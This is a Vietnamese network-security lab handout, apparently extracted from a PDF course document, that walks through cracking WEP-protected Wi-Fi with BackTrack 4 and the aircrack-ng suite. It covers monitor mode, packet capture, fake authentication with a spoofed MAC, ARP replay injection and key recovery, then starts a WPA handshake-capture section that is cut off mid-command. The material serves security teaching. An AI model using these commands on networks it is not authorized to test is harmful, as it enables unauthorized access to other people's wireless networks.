Tấn công mạng Wireless LAN sử dụng bảo mật dạng WEP

Chuẩn bị: Các máy kết nối với nhau theo mô hình Một máy có Wireless Card hỗ trợ Hack Wep (Bài Lab này chúng tôi sử dụng máy có wireless Card với chip Atheros) Công cụ Hack: sử dụng Back|Track 4 Final
Nội dung trích xuất từ tài liệu:
Tấn công mạng Wireless LAN sử dụng bảo mật dạng WEPTấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn LAB TẤN CÔNG VÀ PHÒNG THỦ WIRELESS LAN Hacker Wireless Client Wireless Client Access Point Router ADSL Hình 1.1Tấn công mạng Wireless LAN sử dụng bảo mật dạng WEPChuẩn bị: Các máy kết nối với nhau theo mô hình Một máy có Wireless Card hỗ trợ Hack Wep (Bài Lab này chúng tôi sử dụng máy có wireless Card với chip Atheros) Công cụ Hack: sử dụng Back|Track 4 FinalCác bước thực hiện: Bước 1: Cấu hình máy tính boot từ CD, DVD và chọn Boot từ CD, DVD Hình 1.2 Bước 2: Sử dụng giao diện đồ họa trong Back TrackDangNS iSPACE Lecturer – Network Security Group Trang 1Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Từ dấu nhắc gõ lệnh startx Hình 1.3 Bước 3: Chuyển card mạng sang chế độ monitorMở Terminal (tương tự như DOS trong Windows) và gõ lệnh iwconfig Hình 1.4Chuyển sang chế độ là monitor: gõ lệnh airmon-ng start wlan0 (wlan0 là tên cardmạng, có thể card mạng tên khác như ath0)DangNS iSPACE Lecturer – Network Security Group Trang 2Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.5 Bước 4: Tìm kiếm các Access Point (AP) phát sóng xung quanhGõ lệnh airodump-ng wlan0 Hình 1.6 Bước 5: Chọn AP cần tấn côngMở terminal thứ 2 và gõ lệnh: airodump-ng –c 6 –w wep wlan0DangNS iSPACE Lecturer – Network Security Group Trang 3Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.7 Bước 6: Hacker giả MAC Address (Wireless Client) chứng thực với APMở terminal thứ 3 và gõ lệnh: Aireplay-ng -1 20 –a 00:1B:11:58:7B:A9 –h11:12:13:14:15:16 wlan0 Hình 1.8 Bước 7: Gửi gói tin lên mạng để làm tăng traffic nhằm mục đích thu thập gói tin nhanh hơn để giải mã tìm KEYMở terminal thứ 4 và gõ lệnh: Aireplay-ng -3 –b 00:1B:11:58:7B:A9 –h11:12:13:14:15:16 wlan0DangNS iSPACE Lecturer – Network Security Group Trang 4Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.9 Bước 8: Xem traffic đã thu thập được bao nhiêu (nếu WEP 64bit có thể thu thập khoảng 10000  40000, còn nếu WEP 128bit thì thu thập lên đến khoảng 110000 để giải mã) chúng ta trở lại màn hình ở Bước 4 và 5 để xem ở cột Data Hình 1.10 Bước 9: Tìm KEYMở terminal thứ 5 và gõ lệnh: Aircrack-ng web-01.capDangNS iSPACE Lecturer – Network Security Group Trang 5Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.11 Hình 1.12DangNS iSPACE Lecturer – Network Security Group Trang 6Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Tấn công mạng Wireless LAN sử dụng bảo mật dạng WAPCác bước thực hiện: Bước 1: Cấu hình máy tính boot từ CD, DVD và chọn Boot từ CD, DVD Xem hình 1.2 Bước 2: Sử dụng giao diện đồ họa trong Back Track Từ dấu nhắc gõ lệnh startx Xem hình 1.3 Bước 3: Chuyển card mạng sang chế độ monitorMở Terminal (tương tự như DOS trong Windows) và gõ lệnh iwconfig wlan0 (wlan0 làtên card mạng, có thể card mạng tên khác như ath0) Xem hình 1.4Chuyển sang chế độ là monitor: gõ lệnh airmon-ng start wlan0 Xem hình 1.5 Bước 4: Tìm kiếm các Access Point (AP) phát sóng xung quanhGõ lệnh airodump-ng wlan0DangNS iSPACE Lecturer – Network Security Group Trang 7Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Hình 1.13 Bước 5: Chọn AP cần tấn côngMở terminal thứ 2 và gõ lệnh: airodump-ng –c 6 –w wpa wlan0 Hình 1.14 Hình 1.15DangNS iSPACE Lecturer – Network Security Group Trang 8Tấn Công Và Bảo Mật Mạng Wireless LAN ispace.edu.vn Bước 6: Thiết lập 4 bước bắt tay với AP cần tấn côngGõ lệnh: aireplay-ng -0 1 –b 00:1B:1 ...